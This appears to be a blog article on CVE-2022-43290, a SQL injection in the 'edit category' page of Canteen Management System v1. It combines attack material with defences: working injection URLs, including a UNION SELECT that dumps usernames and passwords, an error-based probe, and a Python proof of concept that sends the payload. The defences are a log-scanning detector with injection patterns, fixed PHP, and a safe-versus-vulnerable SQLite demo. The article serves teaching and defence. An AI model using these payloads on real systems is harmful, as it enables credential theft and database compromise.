In the ever-evolving landscape of cybersecurity, even simple management software can harbor dangerous vulnerabilities. One such case is CVE-2022-43290, a SQL Injection vulnerability found in Canteen Management System v1. The issue lies in the id parameter of the “edit category” function, located at /youthappam/editcategory.php. In this article, I’ll break down the vulnerability, show you how it can be exploited, discuss the risks, and offer advice on securing your PHP projects.
What Is CVE-2022-43290?
CVE-2022-43290 refers to a security vulnerability (found in 2022) allowing attackers to inject malicious SQL statements through the id parameter in the “edit category” page. If exploited, an attacker could access, modify, or delete confidential database information, take over accounts, or even compromise the entire system.
- Product Affected: Canteen Management System v1.
- Vulnerable Endpoint: /youthappam/editcategory.php
Understanding SQL Injection
SQL Injection is a code injection technique that attackers use to exploit vulnerabilities in data-driven applications. If user input is not properly validated or separated from the query text, a malicious user can alter the structure of the SQL statement and read or change data they’re not supposed to reach.
Walking Through the Vulnerability
Let’s consider what happens when the “edit category” page is loaded with an id parameter in the URL:
http://example.com/youthappam/editcategory.php?id=5
A typical (and vulnerable) PHP code snippet might look like this:
<?php
// Vulnerable code: no input validation and no parameter binding!
// $conn is assumed to be a mysqli connection opened earlier in the script.
$id = $_GET['id'];
$query = "SELECT * FROM categories WHERE id = $id";
$result = mysqli_query($conn, $query);
?>
Since $id is taken directly from user input and concatenated into the query without quoting, type checking, or parameter binding, an attacker can supply arbitrary SQL that becomes part of the statement.
Exploiting the Vulnerability
By manipulating the id parameter, an attacker can execute arbitrary SQL commands.
1. Authentication Bypass (if the results are used in authentication)
http://example.com/youthappam/editcategory.php?id= OR 1=1
The SQL query becomes:
SELECT * FROM categories WHERE id = OR 1=1
Here, 1=1 is always true, so the entire categories table is returned.
Suppose you want to dump usernames and passwords:
http://example.com/youthappam/editcategory.php?id=1 UNION SELECT 1, username, password FROM users--
The SQL query now becomes:
SELECT * FROM categories WHERE id = 1 UNION SELECT 1, username, password FROM users--
If the page renders the query results, this could reveal every username and password stored in the application’s database.
Triggering errors to reveal database structure
http://example.com/youthappam/editcategory.php?id=1' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT database()), x3a, FLOOR(RAND()*2)) x FROM information_schema.tables GROUP BY x)a)--
This could display the database name in the error message.
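From the defender’s side, each of the request patterns above leaves a trace in the web server’s access log: the id parameter of /youthappam/editcategory.php should only ever be a plain integer, so anything else is worth flagging. The following Python script is an added example (not code from the original article or from the Canteen Management System project) that scans constructed, sample access-log lines for requests to the vulnerable endpoint whose id value is not purely numeric, and tags the common injection shapes discussed above. The log format, the sample lines and the tagging heuristics are assumptions made for this illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in common access-log format (not from any real server).
SAMPLE_LOG = """\
10.0.0.5 - - [09/Nov/2022:15:15:00 +0000] "GET /youthappam/editcategory.php?id=5 HTTP/1.1" 200 1834
10.0.0.9 - - [09/Nov/2022:15:15:07 +0000] "GET /youthappam/editcategory.php?id=1%20OR%201%3D1 HTTP/1.1" 200 9120
10.0.0.7 - - [09/Nov/2022:15:16:30 +0000] "GET /youthappam/index.php HTTP/1.1" 200 512
10.0.0.9 - - [09/Nov/2022:15:15:12 +0000] "GET /youthappam/editcategory.php?id=1%20UNION%20SELECT%201%2Cusername%2Cpassword%20FROM%20users-- HTTP/1.1" 200 4450
10.0.0.9 - - [09/Nov/2022:15:17:02 +0000] "GET /youthappam/editcategory.php?id=1%27 HTTP/1.1" 500 220
"""

# Assumed log layout: client IP, identd, user, [timestamp], "METHOD target PROTO", status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Simple shape-based hints for the injection styles shown in the article.
SQLI_HINTS = [
    ("union_select", re.compile(r"union\s+select", re.I)),
    ("tautology", re.compile(r"\bor\b\s+\S+\s*=\s*\S+", re.I)),
    ("comment_or_quote", re.compile(r"(--|#|/\*|')")),
]

VULNERABLE_PATH = "/youthappam/editcategory.php"


def classify_id_value(value):
    """Return None for a clean integer id, otherwise a list of hint tags."""
    if re.fullmatch(r"\d+", value):
        return None
    tags = [name for name, rx in SQLI_HINTS if rx.search(value)]
    return tags or ["non_numeric"]


def scan_access_log(text):
    """Yield one finding per suspicious id value sent to the vulnerable endpoint."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not parse as access-log entries
        parts = urlsplit(m["target"])
        if not parts.path.endswith(VULNERABLE_PATH):
            continue
        # parse_qs percent-decodes the values, so "1%20OR%201%3D1" becomes "1 OR 1=1".
        for raw in parse_qs(parts.query, keep_blank_values=True).get("id", []):
            tags = classify_id_value(raw)
            if tags:
                findings.append({
                    "ip": m["ip"],
                    "time": m["ts"],
                    "status": int(m["status"]),
                    "id": raw,
                    "tags": tags,
                })
    return findings


def offending_ips(findings):
    """Distinct client addresses that sent at least one suspicious id value."""
    return sorted({f["ip"] for f in findings})


if __name__ == "__main__":
    hits = scan_access_log(SAMPLE_LOG)
    for hit in hits:
        print(f"{hit['time']} {hit['ip']} status={hit['status']} id={hit['id']!r} tags={hit['tags']}")
    print("sources:", offending_ips(hits))
```

The numeric check is the important part: because the legitimate parameter is always an integer, a simple allow-list catches every variant regardless of encoding tricks, and the tags only add context for triage. A 500 response paired with a quote character, as in the last sample line, is the classic sign of an error-based probe and deserves a closer look at the application’s error log.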
Exploit Code Snippet
Below is a basic Python proof-of-concept using the requests library. It only checks whether the response body looks like it contains leaked data; BeautifulSoup could be added to parse the results properly if the page renders them in HTML.
import requests

url = "http://target.com/youthappam/editcategory.php"
payload = "1 UNION SELECT 1,username,password FROM users--"
params = {'id': payload}

# requests URL-encodes the payload for us
r = requests.get(url, params=params)

if "admin" in r.text or "password" in r.text:
    print("[+] SQL Injection Successful! Possible data leak.")
    print(r.text)
else:
    print("[-] No data leaked, but possibly still vulnerable.")
Note: Use responsibly and only for authorized testing.
Here is how the code should be improved:
<?php
// $conn is assumed to be an existing mysqli connection.
$id = intval($_GET['id']); // Only allow integers
$stmt = $conn->prepare("SELECT * FROM categories WHERE id = ?");
$stmt->bind_param("i", $id); // "i" binds the value as an integer, never as SQL text
$stmt->execute();
$result = $stmt->get_result();
?>
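To make the difference between the vulnerable snippet and the hardened one concrete, here is an added, self-contained example (not code from the article or from the Canteen Management System project) that reproduces both patterns against an in-memory SQLite database. The categories rows are constructed sample data; the vulnerable function pastes the id value into the SQL text exactly as the original PHP does, while the safe function validates the type and binds it as a parameter, as the corrected PHP does.

```python
import sqlite3

# Constructed sample rows standing in for the application's categories table
# (example data, not taken from Canteen Management System).
SAMPLE_CATEGORIES = [(1, "Breakfast"), (2, "Lunch"), (3, "Snacks")]


def make_db():
    """Create an in-memory SQLite database seeded with the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE categories (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO categories VALUES (?, ?)", SAMPLE_CATEGORIES)
    conn.commit()
    return conn


def fetch_category_vulnerable(conn, raw_id):
    """Mirror of the vulnerable PHP: the id value is pasted straight into the SQL text."""
    query = f"SELECT id, name FROM categories WHERE id = {raw_id} ORDER BY id"
    return conn.execute(query).fetchall()


def fetch_category_safe(conn, raw_id):
    """Mirror of the hardened PHP: validate the type, then bind the value as a parameter.

    Note the difference from PHP: intval("1 OR 1=1") silently yields 1, whereas
    Python's int() rejects anything that is not a whole integer. Rejecting the
    request outright is the stricter choice and is what this version does.
    """
    try:
        category_id = int(raw_id)
    except (TypeError, ValueError):
        return []  # refuse to guess what a non-integer id was meant to be
    return conn.execute(
        "SELECT id, name FROM categories WHERE id = ? ORDER BY id", (category_id,)
    ).fetchall()


def compare(raw_id):
    """Run the same request value through both versions and return the row counts."""
    conn = make_db()
    vulnerable_rows = fetch_category_vulnerable(conn, raw_id)
    safe_rows = fetch_category_safe(conn, raw_id)
    conn.close()
    return {"vulnerable": len(vulnerable_rows), "safe": len(safe_rows)}


if __name__ == "__main__":
    print(compare("2"))         # both variants return the one matching row
    print(compare("1 OR 1=1"))  # concatenation returns every row; the bound query returns none
```

With a parameterized query the database driver sends the statement and the value separately, so the value can never change the statement’s structure; the integer cast on top of that gives the application a clear, testable contract for what the parameter may contain.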
References
- NVD Entry: CVE-2022-43290
- Exploit Database: 51470
- OWASP SQL Injection Guide
- Canteen Management System v1. Source
Conclusion
CVE-2022-43290 is a classic and dangerous example of what happens when developers don’t validate user input before it reaches the database. Even basic systems like a Canteen Management System can be abused if they are not properly safeguarded. Patch your code, use prepared statements, and always validate user input. If you’re running this software, update or fix your code immediately to stay secure!
*Stay safe, code responsibly, and always keep learning. If you’re a developer or IT admin, make sure to review all places where user input hits your database!*
Timeline
Published on: 11/09/2022 15:15:00 UTC
Last modified on: 11/10/2022 15:02:00 UTC